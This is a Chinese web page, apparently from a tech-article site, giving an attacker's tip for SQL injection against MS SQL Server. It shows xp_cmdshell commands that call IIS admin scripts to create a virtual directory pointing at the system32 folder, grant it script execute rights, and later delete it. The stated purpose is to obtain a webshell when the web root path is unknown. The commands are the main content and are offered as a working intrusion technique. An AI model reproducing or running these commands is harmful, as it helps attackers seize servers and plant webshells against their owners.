首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

SQL注入建立虚拟目录,找Web绝对路径!

所属分类: 实用技巧 / 漏洞研究 阅读数: 1499
收藏 0 赞 0 分享
我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错: 

exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"' 
建立虚拟目录win,指向c:\winnt\system32 
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture' 
让win句有解析asp脚本权限 

exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/" 
删除虚拟目录。 
找不到web绝对路径的一种解决办法, 

http://21o.net/h4x0r 
403错误,表示虚拟目录建好了。。。  
更多精彩内容其他人还在看

系统安全:Win XP SP2 配置及故障解决技巧大揭露

系统安全:Win XP SP2 配置及故障解决技巧大揭露
收藏 0 赞 0 分享

并不神奇的Real影片木马

并不神奇的Real影片木马
收藏 0 赞 0 分享

新型网络攻击威胁大量网站

新型网络攻击威胁大量网站
收藏 0 赞 0 分享

浅析国内某网络游戏的安全现况

浅析国内某网络游戏的安全现况
收藏 0 赞 0 分享

fckeditor的漏洞详细篇

fckeditor的漏洞详细篇
收藏 0 赞 0 分享

Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范

Dvbbs7.1 sp1 SQL版savepost.asp注入漏洞分析、利用及防范
收藏 0 赞 0 分享

webshell权限提升技巧

webshell权限提升技巧
收藏 0 赞 0 分享

db_owner权限得到webshell

db_owner权限得到webshell
收藏 0 赞 0 分享

sql注入建立虚拟目录

sql注入建立虚拟目录
收藏 0 赞 0 分享

利用图片做木马应用完全解析

利用图片做木马应用完全解析
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 www.zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22